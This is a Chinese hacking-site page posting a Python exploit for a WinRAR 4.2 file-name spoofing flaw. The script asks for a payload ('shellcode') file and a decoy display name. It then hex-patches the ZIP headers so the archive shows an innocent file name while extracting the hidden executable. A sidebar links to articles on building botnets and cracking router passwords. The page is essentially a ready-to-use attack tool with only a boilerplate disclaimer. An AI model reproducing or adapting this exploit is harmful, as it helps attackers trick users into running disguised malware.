WinRar 4.2文件后缀欺骗漏洞EXP
发布时间:2014-04-28 12:39:47作者:知识屋
import zipfile
import binascii
print " Code By Cond0rn [url]http://www.sitedirsec.com[/url]n [url]http://php.mu[/url]"
newname=raw_input("Shellcode File:")
realname=raw_input("Display Name:")
zipname=raw_input("Out Name:")
def copy(file,tofile):
open(tofile, "wb").write(open(file, "rb").read())
def _zipfile(filename,shellcode):
f = zipfile.ZipFile(filename, ''w'' ,zipfile.ZIP_DEFLATED)
f.write(shellcode)
f.close()
if newname and realname and zipname:
copy(newname,realname)
newname_ext="."+newname.split(".")[-1]
realname_ext="."+realname.split(".")[-1]
if len(realname_ext)>len(newname_ext):
newname_ext=" "*(len(realname_ext)-len(newname_ext))+newname_ext
realname_hex=binascii.hexlify(realname)
print "Display name:"+realname
realname_to=binascii.hexlify(realname.replace(realname_ext,newname_ext))
print "Real name:"+realname.replace(realname_ext,newname_ext)
print "Hex:"+realname_to
#print binascii.hexlify(realname)
_zipfile(zipname,realname)
data=binascii.hexlify(open(zipname).read()).split(binascii.hexlify(realname))
data=data[0]+binascii.hexlify(realname.replace(realname_ext,newname_ext))+data[1]+realname_hex+data[2]
#print "Out Data:"+ data
open(zipname,''wb'').write(binascii.unhexlify(data))
print "OK"
(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
相关知识
软件推荐
更多 >
-
1菜鸟简单抓肉鸡(如何抓肉鸡)
2011-06-17
-
2
电脑开机时出现lass.exe进程是病毒吗?
-
3
自拍须谨慎!教你如何通过照片定位查看拍摄地点
-
4
电脑病毒最基础知识
-
5
黑客学员必须了解的C语言技术
-
6
精典详细内网渗透专题文章
-
7
教你破解Tp-Link的无线路由密码
-
8
解决SecureCRT中文显示乱码
-
9
QQ电脑管家和360哪个好?横评实测对比
-
10
攻防实战:无线网络路由入侵过程
